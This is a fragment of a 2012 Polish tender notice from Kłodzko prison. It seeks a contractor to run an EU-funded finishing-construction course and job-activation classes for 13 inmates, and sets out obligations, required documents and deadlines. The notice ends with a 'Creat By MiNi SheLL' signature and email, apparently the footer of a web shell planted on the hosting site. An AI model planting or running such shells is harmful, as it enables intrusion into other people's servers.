w przypadku nie ukończenia kursu przez osadzonego, jeżeli nie zostanie uzupełniona liczba uczestników w powyżej opisany sposób, należna Wykonawcy kwota za przeszkolenie tego osadzonego ustalona w umowie ulegnie pomniejszeniu o kwotę stanowiącą iloczyn ilości godzin kursu, w których osadzony nie uczestniczył i kwoty stanowiącej koszt jednostkowy godziny kursu,
liczba zajęć dydaktycznych w ramach kursu - 120 godz. przy założeniu że jedna godzina to 45 min.,  (tj. 90 godz. zajęć praktycznych, 30 godz. zajęć teoretycznych) 
liczba zajęć dydaktycznych w ramach zajęć aktywizacyjnych - 21 godz. przy założeniu że jedna godzina to 45 min.,  w skład których wchodzi: 7 godz. 
z psychologiem, 7 godz. z liderem Klubu Pracy, 7 godz. z doradcą zawodowym,
Wykonawca zapewnia w ramach zajęć teoretycznych uprawnionych wykładowców, 
a w ramach zajęć praktycznych uprawnionych instruktorów praktycznej nauki zawodu (zał. nr 4 do SIWZ) odpowiednio do rodzaju kursu.  
Zajęcia aktywizacyjne muszą być przeprowadzone przez osoby posiadające licencję doradcy zawodowego lub ukończone studia / studia podyplomowe w zakresie doradztwa zawodowego oraz osoby posiadające uprawnienia Lidera Klubu Pracy. 
Zamawiający wymaga złożenia wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywania przez nich czynności oraz informacji o podstawie dysponowania tymi osobami ( zał. nr 4 do SIWZ). 
Kurs może zakończyć się egzaminem sprawdzającym wiadomości i umiejętności z zakresu kursu. Uczestnicy otrzymają zaświadczenia o ukończeniu kursu zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012. 186) oraz zaświadczenia o ukończeniu zajęć aktywizacyjnych. 
Dodatkowo wykonawca zapewni dla każdego uczestnika kursu certyfikaty ukończenia kursu oraz zajęć aktywizacyjnych, które zawierać będą  zapisy umożliwiające identyfikację źródła finansowania kursu  i zajęć aktywizacyjnych poprzez zamieszczenie następującego zapisu: Kurs współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Certyfikat powinien zostać opatrzony aktualnymi logotypami Unii Europejskiej oraz logo Programu Kapitał Ludzki Narodowa Strategia Spójności. 
Zamawiający zobowiązuje się do udostępnienia sprzętu zakupionego w ramach projektu, w celu wykorzystania go podczas zajęć teoretycznych i praktycznych kursu:
- zajęcia teoretyczne: rzutnik multimedialny, możliwość korzystania z sali komputerowej wraz z wyposażeniem;
- zajęcia praktyczne: pistolet natryskowy ze sprężarką, rusztowanie aluminiowe,  szlifierka do powierzchni gipsowych,  mieszadło do farb, młoty udar.-obrot,   przecinarka elektryczna do glazury, dłuta, wiertła, przecinaki; 
Wykonawca zobowiązany jest zapewnić na swój koszt:
- przeprowadzenie badań lekarskich przed rozpoczęciem szkolenia dla 13 uczestników kursu, badania będą odbywały się na terenie Zakładu Karnego w Kłodzku, Wykonawca przedstawi  Zamawiającemu kserokopie zaświadczeń lekarskich, 
- ubezpieczenie w niezbędnym zakresie (NNW) uczestników kursu i zajęć aktywizacyjnych, Wykonawca przedstawi Zamawiającemu kserokopie dowodu ubezpieczenia, 
- pokrycia kosztów  ubezpieczenia oraz pokrycia kosztów wymaganych odrębnymi przepisami badań lekarskich 2 osób z listy rezerwowej, w razie konieczności pokrycia kosztów odzieży roboczej dla wprowadzonych uczestników rezerwowych,
- w ramach zajęć teoretycznych podręczniki, skrypty, materiały papiernicze, przybory do pisania (wkład koloru niebieskiego lub zielonego), środki dydaktyczne niezbędne do realizacji kursów i zajęć aktywizacyjnych, na których Wykonawca umieści  zapisy umożliwiające identyfikację źródeł finansowania lub opatrzy je logotypami umożliwiającą taką identyfikację zgodnie z treścią Wytycznych w zakresie informacji i promocji oraz Wytycznych dot. oznaczania projektów w ramach POKL,
- w ramach zajęć praktycznych odzież ochronną zgodnie z bhp w ilości 13 kompletów składających się z: spodni na szelkach, podkoszulki, bluzy, czapki, rękawic i obuwia roboczego a także środki ochrony indywidualnej,
- w ramach zajęć praktycznych materiały niezbędne do prawidłowego przeprowadzenia zajęć w wysokości nie większej niż 40% kosztu kursu (bez zajęć aktywizacyjnych). Ilość oraz asortyment materiałów niezbędnych do realizacji zajęć praktycznych określonych w programie kursu  winny mieć charakter celowy i uwzględniać wymogi jakie określa program nauczania oraz jego cel. Tym samym ilość zakupionych i wykorzystanych materiałów powinna odpowiadać zakresowi, planowi zajęć praktycznych z uwzględnieniem ilości beneficjentów biorących udział w szkoleniu. Wykonawca przedłoży Zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu, 
- w ramach zajęć praktycznych niezbędny sprzęt oraz narzędzia drobne do zrealizowania zajęć, których nie posiada Zamawiający..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą  spełnia - nie spełnia , na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z tych dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą  spełnia - nie spełnia , na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z tych dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą  spełnia - nie spełnia , na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z tych dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą  spełnia - nie spełnia , na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z tych dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą  spełnia - nie spełnia , na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z tych dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenia o posiadaniu aktualnego na dany rok kalendarzowy wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy (zał. nr 3 do SIWZ);
2. oświadczenia, o posiadaniu uprawnienia oraz odpowiednich kwalifikacji i warunków do należytego wykonania przedmiotu umowy zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012, poz. 186)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Kłodzko
ul. Bohaterów Getta 16
57-300 Kłodzko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 09:45, miejsce: Zakład Karny Kłodzko
ul. Bohaterów Getta 16
57-300 Kłodzko
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia są usługi w zakresie przeprowadzenia kursów oraz przeprowadzenia dla grup biorących udział w kursach zajęć aktywizacyjnych (CPV 80.50.00.00-8- usługi szkolenia zawodowego) w ramach projektu p.n. Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowanego przez Centralny Zarząd Służby Więziennej. Projekt ten jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com